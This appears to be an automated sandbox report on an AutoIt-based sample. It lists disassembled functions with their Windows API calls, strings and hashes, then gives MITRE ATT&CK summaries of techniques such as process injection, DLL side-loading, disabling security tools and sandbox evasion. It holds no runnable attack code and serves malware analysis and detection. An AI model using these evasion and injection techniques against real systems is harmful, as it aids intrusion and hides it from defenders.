Opcode ID: efc9cdd305863f3e130e4f8340d0cb057cccf505f9d8a475af6fed5984d277cf
Instruction ID: 1789b8765d60c4c749eb17436c51448bb391ee940fc272d3ec0f9d6644de925d
Opcode Fuzzy Hash: efc9cdd305863f3e130e4f8340d0cb057cccf505f9d8a475af6fed5984d277cf
Instruction Fuzzy Hash: 27019275640119ABCB04AB64CC65CFE7B64FB87355F10061BAC22972C1DF35580C8791

Function 00552525 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004FB329: _wcslen.LIBCMT ref: 004FB333

Part of subcall function 005545FD: GetClassNameW.USER32(?,?,000000FF), ref: 00554620

SendMessageW.USER32(?,00000180,00000000,?), ref: 00552593

Strings

ComboBox, xrefs: 00552532
ListBox, xrefs: 0055255D

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 752d5bb4147a05d72dde60a9e940da4fb1ada848c515bff3f9f5272f22ce5cd2
Instruction ID: 07e5a3a02657b5f0d9bf5076e7022daabd0d71d9a45d685b5b2fce7bf6cbe2c8
Opcode Fuzzy Hash: 752d5bb4147a05d72dde60a9e940da4fb1ada848c515bff3f9f5272f22ce5cd2
Instruction Fuzzy Hash: D10184756401096BCB04E790C976EFE7BA8EF56346F50001B6D02A7281EB149A0C97B1

Function 005525A9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004FB329: _wcslen.LIBCMT ref: 004FB333

Part of subcall function 005545FD: GetClassNameW.USER32(?,?,000000FF), ref: 00554620

SendMessageW.USER32(?,00000182,?,00000000), ref: 00552615

Strings

ComboBox, xrefs: 005525B6
ListBox, xrefs: 005525E1

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 3813b4342c075329b1cfc49a105d7a318369f9db49f07e9f6fa1c59fe1c2985d
Instruction ID: 8894faa66908a91bf2174b16a38979909b1789c30c31f9e53d5ebc9fe0aacc5c
Opcode Fuzzy Hash: 3813b4342c075329b1cfc49a105d7a318369f9db49f07e9f6fa1c59fe1c2985d
Instruction Fuzzy Hash: 5E01A275A4010966CB15E7A0C921EFE7BB8EB16345F50002BBD02A3281EA659E0C9BB6

Function 005526B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004FB329: _wcslen.LIBCMT ref: 004FB333

Part of subcall function 005545FD: GetClassNameW.USER32(?,?,000000FF), ref: 00554620

SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00552720

Strings

ComboBox, xrefs: 005526C2
ListBox, xrefs: 005526ED

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: a58c1e4c872a5175db68aeb7155859916ac4f3efdb355e95c75f6a0b2b716d00
Instruction ID: 5b3fbc925292d3d7dd87a415680d5d6cae38d02efac5456610ae50e0c3b4bbf9
Opcode Fuzzy Hash: a58c1e4c872a5175db68aeb7155859916ac4f3efdb355e95c75f6a0b2b716d00
Instruction Fuzzy Hash: 12F0F475A4021866CB04E3A4CC61FFE7B78FF06355F40091BBC22A32C1DB64580C87A4

Function 00589AFD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004F249F: GetWindowLongW.USER32(00000000,000000EB), ref: 004F24B0

DefDlgProcW.USER32(?,0000002B,?,?,?), ref: 00589B6D

Part of subcall function 004F2234: GetWindowLongW.USER32(?,000000EB), ref: 004F2242

SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00589B53

Strings

(\, xrefs: 00589B06

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: LongWindow$MessageProcSend
String ID: (\
API String ID: 982171247-3685820393
Opcode ID: 85c491d398b2e69735b2dd1d78c221e14fe184bc6219d681b64a6658828cce23
Instruction ID: f4930640a0e42462b28d7b21d0b9563bb1fa1ad8786f4f8f5ca1944fed6e1f6a
Opcode Fuzzy Hash: 85c491d398b2e69735b2dd1d78c221e14fe184bc6219d681b64a6658828cce23
Instruction Fuzzy Hash: 0E01D434104218BFDB25AF14EC44F763FB6FB85366F140569FD022A1E0C7726845EB64

Function 00523A62 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMONLIBRARYCODE

Download Yara Rule

Strings

2<R, xrefs: 00523A64
j3Y, xrefs: 00523A88

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID:
String ID: 2<R$j3Y
API String ID: 0-523750023
Opcode ID: 6b85941435bcb16a1841e8196138fd4cba66de465ea1fac85494fc9eae90b83a
Instruction ID: 53667eca3386fef10f05bdc1f3dd7359b26d37d156dc2c5ae9a5eb3edb40b622
Opcode Fuzzy Hash: 6b85941435bcb16a1841e8196138fd4cba66de465ea1fac85494fc9eae90b83a
Instruction Fuzzy Hash: 72F0F025100118AADB108B90D840AB93BB9EF05700F00447ABC89C72C0FB788F80E365

Function 00588432 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

Part of subcall function 004F249F: GetWindowLongW.USER32(00000000,000000EB), ref: 004F24B0

GetWindowLongW.USER32(?,000000F0), ref: 00588471
GetWindowLongW.USER32(?,000000EC), ref: 0058847F

Strings

(\, xrefs: 0058843E

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: LongWindow
String ID: (\
API String ID: 1378638983-3685820393
Opcode ID: 4137d458c8a305c8c53237acb47e6db3f01340cb2ae0760d63632dd373b14d37
Instruction ID: f067e7512322b52ae13c967dfbd6ab77fa3e7a313558f7ce496fd251f41858b2
Opcode Fuzzy Hash: 4137d458c8a305c8c53237acb47e6db3f01340cb2ae0760d63632dd373b14d37
Instruction Fuzzy Hash: EFF049362012059FCB14EF69DC44D7A7BB5FB9A324B504A2DFA26973F0DB709844EB10

Function 00551461 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0055146F

Strings

AutoIt, xrefs: 00551463
Error allocating memory., xrefs: 00551468

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: 3c61ec7cc8f77ec01e35b552adb51eaeace2e7fdc0bfcf0e3428c5d35bb36b64
Instruction ID: 7c9cb767f68a6b7d18dac728a1614561f0f7056a48e1070b4e64eb44133b9949
Opcode Fuzzy Hash: 3c61ec7cc8f77ec01e35b552adb51eaeace2e7fdc0bfcf0e3428c5d35bb36b64
Instruction Fuzzy Hash: EBE0D8322C471936E6103794AC07FD57FD5AF04B61F11481FFB88684C24EE624D083AD

Function 005110B3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 0050FAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,005110E2,?,?,?,004F100A), ref: 0050FAD9

IsDebuggerPresent.KERNEL32(?,?,?,004F100A), ref: 005110E6
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,004F100A), ref: 005110F5

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 005110F0

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: b21e2860689945ad4539d1405097d125960ddb5870f7465475f25695e37af10f
Instruction ID: 197f2512bf105aad41fb1d95d25866c5e18bbb0ac3f903ed8add58e6fdc2f964
Opcode Fuzzy Hash: b21e2860689945ad4539d1405097d125960ddb5870f7465475f25695e37af10f
Instruction Fuzzy Hash: 77E06D70600B518FE7309F38E808786BFF4BB14704F008D5DE986C2691DBB8E488CBA1

Function 0050F114 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0050F151

Strings

`5\, xrefs: 0050F131
h5\, xrefs: 0050F146

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Init_thread_footer
String ID: `5\$h5\
API String ID: 1385522511-385243863
Opcode ID: 5439546b9cce790ecb5fcaa09a4496ffb0bd000c66cb7eddc600c8f636ed54ce
Instruction ID: 149a27d459d0cbc29f947ffbfe4900f8c689bafcdf3538f0ee91fefaaba6ad42
Opcode Fuzzy Hash: 5439546b9cce790ecb5fcaa09a4496ffb0bd000c66cb7eddc600c8f636ed54ce
Instruction Fuzzy Hash: 35E0DF71404818CFC720E72CE849ECC3BB1BB49720F108278E102877D1CB342A82EB14

Function 005639D8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000001), ref: 005639F0
GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00563A05

Strings

aut, xrefs: 005639F9

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 67193e53a6317cf4ddfed1646272822dfa0baee24c7a99d876fc4375c71301d9
Instruction ID: e224a3f0a8172743f7d2c52482012e58c4196a2b53cba9325ba90536cb050017
Opcode Fuzzy Hash: 67193e53a6317cf4ddfed1646272822dfa0baee24c7a99d876fc4375c71301d9
Instruction Fuzzy Hash: 9ED05B7550031867DA6097549C0DFDB7B7CDB44710F0001917E55A10D1DAB0D549C7A0

Function 00582DF2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00582E08
PostMessageW.USER32(00000000), ref: 00582E0F

Part of subcall function 0055F292: Sleep.KERNEL32 ref: 0055F30A

Strings

Shell_TrayWnd, xrefs: 00582E01

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 1f549176ac74e3b22e747532a1c8ee66ca85dcb0663d330fdd35b788230bc3e3
Instruction ID: 266016cda3510a49a4317bd8d7e31e5c03ea0112ba1f2f339975551d34464251
Opcode Fuzzy Hash: 1f549176ac74e3b22e747532a1c8ee66ca85dcb0663d330fdd35b788230bc3e3
Instruction Fuzzy Hash: 4ED0A9353813047BE224A330AC0FFC22BA0ABA4B10FA008227A45AA0C0C8A068048B64

Function 00582DBE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00582DC8
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00582DDB

Part of subcall function 0055F292: Sleep.KERNEL32 ref: 0055F30A

Strings

Shell_TrayWnd, xrefs: 00582DC1

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 16b6224f4bae207315a694e44295554de64cfacb971e02a82a071c35eb669769
Instruction ID: b8fb5ccb40ac1d35435a28e8c799147dea1133b646bc5878d37e5fc1fceff27f
Opcode Fuzzy Hash: 16b6224f4bae207315a694e44295554de64cfacb971e02a82a071c35eb669769
Instruction Fuzzy Hash: 8AD0A939394304B7E224A330AC0FFD22FA0AFA0B10F6008227A49AA0C0C8A068048B60

Function 0052C17D Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 0052C213
GetLastError.KERNEL32 ref: 0052C221
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0052C27C

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: d7d109efdebdc74b8ef3ff6ba8a2b5a8f565def6132c246f6020fa0576e34fa5
Instruction ID: 970440a81a351ef9f45c3b0b44f27faa96df69b858a66c887aeeae5422d670d2
Opcode Fuzzy Hash: d7d109efdebdc74b8ef3ff6ba8a2b5a8f565def6132c246f6020fa0576e34fa5
Instruction Fuzzy Hash: 7A41D734600226EFDB218FE5E844AAE7FA5FF53710F244169E895AB2E2DF309D01C760

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
